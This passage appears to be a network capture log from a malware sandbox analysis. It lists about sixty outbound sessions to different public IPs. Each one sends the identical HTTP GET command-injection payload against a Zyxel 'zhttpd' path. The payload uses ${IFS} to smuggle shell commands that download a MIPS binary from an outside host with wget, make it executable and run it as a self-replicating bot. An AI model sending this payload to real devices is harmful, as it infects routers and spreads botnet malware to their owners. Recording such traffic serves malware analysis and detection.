                                        Jan 14, 2024 16:18:32.166544914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1156192.168.2.133860645.3.188.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.166603088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1157192.168.2.135833248.230.228.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.166657925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1158192.168.2.1336988206.113.2.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.166723013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1159192.168.2.1356370147.106.221.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.166760921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1160192.168.2.1348436134.55.119.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.166820049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1161192.168.2.1354924152.27.39.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.166851044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1162192.168.2.134298035.193.79.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.166913033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1163192.168.2.1349604172.139.82.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.166956902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1164192.168.2.13596222.135.55.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.167016029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1165192.168.2.1341616162.150.223.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.167088985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1166192.168.2.134535420.182.3.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.167126894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1167192.168.2.1350746174.211.89.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.167177916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1168192.168.2.1360488201.122.127.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.167228937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1169192.168.2.1358518223.15.182.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.167282104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1170192.168.2.1345610147.201.145.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.167334080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1171192.168.2.1336338143.120.159.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.167370081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1172192.168.2.1358792125.34.90.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.167428017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1173192.168.2.135365477.134.80.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.172025919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1174192.168.2.1344708159.44.91.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.172086000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1175192.168.2.135721618.68.73.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177098989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1176192.168.2.1343302109.231.139.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177202940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1177192.168.2.1334224209.99.211.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177249908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1178192.168.2.135530481.45.195.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177289009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1179192.168.2.1342428220.29.228.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177340031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1180192.168.2.135624057.57.18.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177382946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1181192.168.2.1357400196.41.154.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177409887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1182192.168.2.1354506148.138.164.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177459002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1183192.168.2.1355966197.69.27.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177506924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1184192.168.2.13516385.95.239.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177534103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1185192.168.2.1349758171.36.119.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177576065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1186192.168.2.1351994203.33.2.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177630901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1187192.168.2.1338682193.193.148.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177639008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1188192.168.2.1343478143.12.47.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177711010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1189192.168.2.134892666.223.48.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177752018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1190192.168.2.135288879.175.171.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177781105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1191192.168.2.1339166169.13.122.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177841902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1192192.168.2.1359506223.180.27.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177895069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1193192.168.2.133930818.32.71.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177930117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1194192.168.2.134804067.238.85.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177939892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1195192.168.2.1335348120.97.172.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.177994013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1196192.168.2.13394382.157.22.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178030014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1197192.168.2.1345734106.55.174.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178066015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1198192.168.2.1338014128.228.209.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178133965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1199192.168.2.1345916209.146.59.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178168058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1200192.168.2.135245042.53.132.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178212881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1201192.168.2.135488291.93.104.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178237915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1202192.168.2.135662258.47.239.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178296089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1203192.168.2.1332964105.221.149.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178361893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1204192.168.2.13388304.184.50.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178386927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1205192.168.2.135600248.51.94.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178448915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1206192.168.2.134964846.51.178.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178497076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1207192.168.2.135968034.171.191.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178539038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1208192.168.2.1333604211.178.126.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178596973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1209192.168.2.133367612.111.177.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178642035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1210192.168.2.1338736123.195.170.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178668976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1211192.168.2.133428450.107.200.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178725958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1212192.168.2.1346310142.185.171.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178751945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1213192.168.2.1347284160.167.7.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178809881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1214192.168.2.135021095.88.198.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178865910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1215192.168.2.1343872213.178.135.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178900003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1216192.168.2.135926288.215.69.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178960085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1217192.168.2.1343328142.245.41.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.178982973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1218192.168.2.134681265.105.236.106443
                                        TimestampBytes transferredDirectionData
